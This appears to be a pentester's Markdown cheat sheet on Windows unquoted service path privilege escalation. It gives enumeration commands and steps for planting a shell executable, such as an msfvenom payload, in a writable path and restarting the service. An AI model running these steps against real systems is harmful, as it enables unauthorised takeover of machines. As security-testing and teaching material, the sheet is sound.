57 lines
1.6 KiB
Markdown
57 lines
1.6 KiB
Markdown
# Unquoted Path
|
|
|
|
* Path to a service without quotes can be hijacked by inserting other executables and services into the path.
|
|
* Some part of path has to be writeable, windows tries to insert `.exe` instead of a space.
|
|
* Check services via `wmic service get name,displayname,pathname,startmode` and `sc qc <servicename>`
|
|
* Check permissions on paths via `.\accesschk64.exe /accepteula -uwdq "C:\Service Path\"`
|
|
|
|
## Enumeration
|
|
|
|
* Check paths
|
|
```sh
|
|
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
|
|
```
|
|
|
|
* Check permissions on these paths
|
|
```
|
|
cacls "c:\program files\directory"
|
|
powershell -c "Get-WMIObject -Class Win32_Service -Filter \"Name='<service name>'\" | select-object *"
|
|
```
|
|
|
|
## Example
|
|
* The unquoted path is `C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe`
|
|
```sh
|
|
copy C:\shell.exe "C:\Program Files\Unquoted Path Service\Common.exe"
|
|
```
|
|
```sh
|
|
net start <service>
|
|
```
|
|
|
|
## Intel about Service
|
|
|
|
* Access should contain writeable
|
|
```sh
|
|
Get-Acl -Path <path> | Format-List
|
|
```
|
|
|
|
* Save the script [Get-ServiceAcl.ps1](https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/) and `Import-Module Get-ServiceAcl.ps1`
|
|
|
|
* Check `ServiceRights` via
|
|
```sh
|
|
"<servicename>" | Get-ServiceAcl | select ExpandProperty Access
|
|
```
|
|
|
|
## Interacting with the Service
|
|
|
|
* Upload msfvenom shell to the writeable path, setup listener and
|
|
```sh
|
|
sc start "servicename"
|
|
Stop-Service -name "servicename"
|
|
Start-Service -name "servicename"
|
|
```
|
|
|
|
## PoC
|
|
|
|
* [MattyMcFatty's PoC](https://github.com/mattymcfatty/unquotedPoC.git)
|
|
|